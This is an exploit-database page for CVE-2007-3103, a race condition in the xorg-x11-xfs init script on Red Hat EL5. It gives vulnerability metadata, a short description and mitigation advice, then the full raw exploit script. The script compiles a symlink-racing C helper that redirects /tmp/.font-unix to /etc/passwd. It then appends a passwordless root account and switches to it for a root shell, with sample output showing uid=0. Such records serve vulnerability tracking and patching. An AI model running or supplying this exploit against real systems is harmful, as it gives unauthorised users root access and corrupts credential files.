header-logo
Suggest Exploit
vendor:
Xorg-x11-xfs
by:
vl4dZ
7.2
CVSS
HIGH
Race Condition
362
CWE
Product Name: Xorg-x11-xfs
Affected Version From: 1.0.2-3.1
Affected Version To: 1.0.2-3.1
Patch Exists: YES
Related CWE: CVE-2007-3103
CPE: a:xorg:xorg-x11-xfs
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0519/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-3103/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0520/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0520/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0519/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Redhat EL5
2007

Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103)

Xorg-x11-xfs Race Condition Vuln local root exploit is a vulnerability in the Xorg-x11-xfs service which allows a local user to gain root privileges. The vulnerable code is located in the start() function of the /etc/init.d/xfs script, which creates a directory with world-writable permissions and then fails to remove it. This allows a local user to create a symlink to a file of their choice, which is then overwritten by the root user when the xfs service is restarted. This exploit was discovered in 2007 and affects xorg-x11-xfs versions <= 1.0.2-3.1.

Mitigation:

The vulnerability can be mitigated by ensuring that the xorg-x11-xfs service is running the latest version, and by setting the permissions of the /tmp/.font-unix directory to be non-world-writable.
Source

Exploit-DB raw data:

#!/bin/sh
# Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103)
# 
# Another lame xploit by vl4dZ :)) works on redhat el5 and before 
#
#  $ id
#  uid=1001(kecos) gid=1001(user) groups=1001(user)
#  $ sh xfs-RaceCondition-root-exploit.sh 
#  [*] Generate large data file in /tmp/.font-unix
#  [*] Wait for xfs service to be (re)started by root...
#  [*] Hop, symlink created...
#  [*] Launching root shell
#  -sh-3.1# id
#  uid=0(root) gid=0(root) groups=0(root)

# Vulnerable version is xorg-x11-xfs <= 1.0.2-3.1 and vulnerable code is 
# located in the start() function of the /etc/init.d/xfs script:
# ...
#    rm -rf $FONT_UNIX_DIR
#    mkdir $FONT_UNIX_DIR
#    chown root:root $FONT_UNIX_DIR
#    chmod 1777 $FONT_UNIX_DIR
# ...

# I'm listening right now to nice free music: 
# http://www.jamendo.com/fr/album/5919

FontDir="/tmp/.font-unix"
Zero=/dev/zero
Size=900000

if [ ! -d $FontDir ]; then
   printf "Is xfs running ?\n"
   exit 1
fi

cd /tmp
cat > sym.c << EOF
#include <unistd.h>
int main(){
for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0)
{return 0;}}}
EOF

cc sym.c -o sym>/dev/null 2>&1
if [ $? != 0 ]; then
   printf "Error: Cant compile code"
   exit 1
fi

printf "[*] Generate large data file in $FontDir\n"
dd if=${Zero} of=${FontDir}/BigFile bs=1024 count=${Size}>/dev/null 2>&1
if [ $? != 0 ]; then
   printf "Error: cant create large file"
   exit 1
fi

printf "[*] Wait for xfs service to be (re)started by root...\n"
./sym
if [ $? != 0 ]; then
   printf "Error: code failed...\n"
   exit 1
fi

if [ -L /tmp/.font-unix ]; then
    printf "[*] Hop, symlink created...\n"
    printf "[*] Launching root shell\n"
    sleep 2
    rm -f /tmp/.font-unix
    echo "r00t::0:0::/:/bin/sh" >> /etc/passwd
fi
su - r00t

# milw0rm.com [2008-02-21]

Navigation

Suggest Exploit

Services By CQR